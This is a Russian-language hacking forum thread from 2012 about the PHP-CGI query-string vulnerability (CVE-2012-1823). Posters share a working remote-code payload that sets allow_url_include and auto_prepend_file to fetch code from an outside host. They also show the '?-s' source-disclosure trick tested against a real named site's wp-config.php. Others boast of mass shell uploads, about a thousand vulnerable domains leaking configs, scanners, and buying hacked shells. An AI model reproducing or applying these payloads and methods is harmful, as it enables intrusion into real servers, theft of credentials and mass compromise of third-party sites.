Критическая уязвимость PHP случайно опубликована в открытом доступе

Discussion in 'Мировые новости. Обсуждения.' started by d3l3t3, 5 May 2012.

  1. cylaaaan

    cylaaaan Elder - Старейшина

    Joined:
    31 Aug 2006
    Messages:
    0
    Likes Received:
    44
    Reputations:
    8
    нихерррасе. я че то пробовал. не получалось именно какой то файл посмотреть, тока индекс, щас еще раз попробую)
     
  2. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    to BLurpi^_^
    Не хорошо делать перепост найденных чужих уязвимостей, с других форумов! :mad:

    З.Ы.
    Скоро на всех форумах страны... Школьники завалят всех шеллами, заливка в два клика происходит как никак! ;)
     
    #42 cat1vo, 6 May 2012
    Last edited: 6 May 2012
  3. tmp

    tmp Banned

    Joined:
    10 Mar 2005
    Messages:
    420
    Likes Received:
    32
    Reputations:
    1
    http://www.php-security.net/archives/9-New-PHP-CGI-exploit-CVE-2012-1823.html

    Спасиб за ответ! Ща буду дальше разбираться)))
     
  4. proroot

    proroot Member

    Joined:
    31 Jan 2012
    Messages:
    46
    Likes Received:
    5
    Reputations:
    0
    Ну и как с помощью него залить любой файл или удалено выполнить код
     
  5. Jamsho0T

    Jamsho0T New Member

    Joined:
    14 Jul 2009
    Messages:
    72
    Likes Received:
    3
    Reputations:
    1
    что то не видно чтобы шеллы тоннами продавали)

    прикупил бы пару трафистых по дешевке))
     
  6. A_n_d_r_e_i

    A_n_d_r_e_i Active Member

    Joined:
    2 Sep 2009
    Messages:
    180
    Likes Received:
    250
    Reputations:
    27
    Что за херь ты жрешь..
     
  7. tmp

    tmp Banned

    Joined:
    10 Mar 2005
    Messages:
    420
    Likes Received:
    32
    Reputations:
    1
    Еще не понятно. Написано:

    но ведь по данной ссылке:

    и работает. хз.
     
  8. LibertyPaul

    LibertyPaul New Member

    Joined:
    16 Jan 2010
    Messages:
    36
    Likes Received:
    0
    Reputations:
    0
    FastCGI не подвержен.
     
  9. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,588
    Likes Received:
    405
    Reputations:
    196

    Пример выше это опровергает же.
     
  10. .Varius

    .Varius Elder - Старейшина

    Joined:
    5 May 2009
    Messages:
    566
    Likes Received:
    289
    Reputations:
    42
    Небольшая заплатка до выхода оффициальной:
    При особых условиях должна выручить :)
     
    #50 .Varius, 6 May 2012
    Last edited: 7 May 2012
  11. d3l3t3

    d3l3t3 Banned

    Joined:
    3 Dec 2010
    Messages:
    1,771
    Likes Received:
    98
    Reputations:
    10
    спамер, спамер! :p
    а за заплатку сенкью.
     
  12. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,781
    Likes Received:
    854
    Reputations:
    857
    Чёт не совсем допонял...

    _ttp://sudarikov.ru/?-s

    отдаёт сорец

    _ttp://sudarikov.ru/wp-config.php

    файл существует

    _ttp://sudarikov.ru/wp-config.php?-s

    выдаёт фигу

    Хотя по логике должен отдавать исходник
     
    _________________________
  13. AnGeI

    AnGeI Elder - Старейшина

    Joined:
    8 Dec 2008
    Messages:
    396
    Likes Received:
    79
    Reputations:
    16
    Седари, позвольте полюбопытствовать, каким образом вы отличается CGI / FastCGI / модуль апача извне?
     
  14. |qbz|

    |qbz| Banned

    Joined:
    25 Dec 2009
    Messages:
    388
    Likes Received:
    169
    Reputations:
    65
    Не задавай глупых вопросов.
     
  15. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    952
    Likes Received:
    318
    Reputations:
    52
    ?-d+allow_url_include%3d1+-d+auto_prepend_file%3dhttp://domain.com/code.txt

    code.txt
     
  16. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,781
    Likes Received:
    854
    Reputations:
    857

    У кого нить сработало ??

    Буду благодарен за пример, можно в ПМ.

    З.Ы. Есть около 1к уязвимых доменов, половина из них ведёт себя неадекватно на определённых файлах. Другая половина успешно открывает конфиги.
     
    _________________________
  17. d3l3t3

    d3l3t3 Banned

    Joined:
    3 Dec 2010
    Messages:
    1,771
    Likes Received:
    98
    Reputations:
    10
    [off]это абсолютный рекорд...за 2 дня 6000+ просмотров новости...[/off]
     
    #57 d3l3t3, 7 May 2012
    Last edited: 7 May 2012
  18. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    to BigBear

    У меня все работает, вот только когда ты заливаешься на сайт, понимаешь, ты такой не один... Вот только наши школьники не умеют заливаться без следов. И чувствую что большинство хостингов, на которых были найдены данные баги, скоро лавочку прикроют!
     
  19. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,781
    Likes Received:
    854
    Reputations:
    857

    В асю 906047 отпиши - думаю, сработаемся.

    Уже написал 2 сканера для данной баги, один по списку урл, другой по конфигам.
     
    _________________________
  20. BLurpi^_^

    BLurpi^_^ Banned

    Joined:
    9 Feb 2011
    Messages:
    252
    Likes Received:
    27
    Reputations:
    9
    Вот странно, что никто ранее не нашел эту уязвимость...,, сорцы php точно смотрел orb(создатель wso), показывал какой то отрезок из safe_mod.c, неужели их смотрело так мало людей\смотрели так невнимательно, что не смогли обнаружить?
     
Loading...